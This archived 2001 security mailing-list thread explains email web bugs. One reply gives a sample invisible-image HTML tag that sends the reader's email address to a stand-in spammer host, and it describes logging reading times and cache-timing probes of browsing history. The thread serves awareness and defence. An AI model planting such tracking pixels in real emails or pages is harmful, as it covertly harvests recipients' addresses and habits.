Re: Email webbugs

From: Mariano Vassallo (anakinat_private)
Date: Tue Aug 28 2001 - 11:13:36 PDT

  • Next message: joetestaat_private: "\'useradd -p\' problems."

    afaik, webbugs work like this:
    Spammer X sends you an HTML mail with an invisible image from his site
     <img src=http://www.weluvspam.com/bug.gif height=1 whidth=1> )
    When you read this email in Outlook, the image (bug.gif) is downloaded from
    the spammers site.
    If the image is generated by a CGI script he can log the time you read your
    mail, and validate your address.
     for example, instead of bug.gif, he could use a script to create the image:
        <img
    src=youremailat_private">http://www.weluvspam.com/createimage.php?mail=youremailat_private >
        the script (createimage.php) could :
            save the "mail=youremailat_private" parameter to a database of
    valid email addresses
            save the time of the day you checked your mail (combined with the
    time the email was sent - taken from a database- it can be used to know how
    often a person checks his mail, and at what time)
            determine wheter you visited a certain website recently (timming how
    long it takes to load an image from that website. if it loads inmediatly,
    then you probably have it in your browsers cache)
    
    Mariano
    
    ----- Original Message -----
    From: "Dom De Vitto" <Domat_private>
    To: "Peter Pekala" <peterpat_private>; "abuse" <postmasterat_private>;
    "Focus-MS" <focus-msat_private>
    Cc: "VULN-DEV@SECURITYFOCUS. COM" <VULN-DEVat_private>;
    "BUGTRAQ@SECURITYFOCUS. COM" <BUGTRAQat_private>;
    <win2ksecadviceat_private>
    Sent: Tuesday, August 28, 2001 5:42 AM
    Subject: RE: Email webbugs
    
    
    > Webbugs are NOT return receipts!!
    > Everybody should *at least* have return-receipts set to 'prompt'.
    > That is a no-brainer.
    > Web bugs are totally different, and can divulg a lot more information -
    > especially when tallied with cross-host information.
    >
    > Dom
    > -----Original Message-----
    > From: Peter Pekala [mailto:peterpat_private]
    > Sent: 27 August 2001 17:11
    > To: abuse; Focus-MS
    > Cc: VULN-DEV@SECURITYFOCUS. COM; BUGTRAQ@SECURITYFOCUS. COM;
    > win2ksecadviceat_private
    > Subject: Re: Email webbugs
    >
    >
    > In Outlook Express - Have you tried configuring this through Tools -
    > Options - Receipts - Returning Read Receipts ?
    >
    > - Peter
    >
    >
    > : One of the things that has always bothered me about Outlook Express and
    > : Outlook is that they are susceptable to webbugs. Basically there are no
    > : options to block confirmation of your reading an email so any spammer
    can
    > : verify that your address is active as long as they can get you to just
    > view
    > : an email.
    > :
    > : A lot of people have difficulty understanding exactly what this means so
    I
    > : set up a demonstration page at http://www.nthelp.com/OEtest/oe.htm in an
    > : attempt to raise awareness of this nonsense and get MS to do something
    > about
    > : it. I don't know if other email programs like Eudora and Netscape are
    > : vulnerable to email webbugs so if anyone tests those please let me know
    > the
    > : results.
    > :
    > : Anyway, I've made the test site available to the public now so if you
    want
    > : to check your email reader, feel free.
    > :
    > : Geo.
    > :
    >
    >
    >
    >
    
    
    
    ---------------------------------------------
    Servicio provisto por EDUNEXO
    ---------------------------------------------
    



    This archive was generated by hypermail 2b30 : Tue Aug 28 2001 - 12:46:16 PDT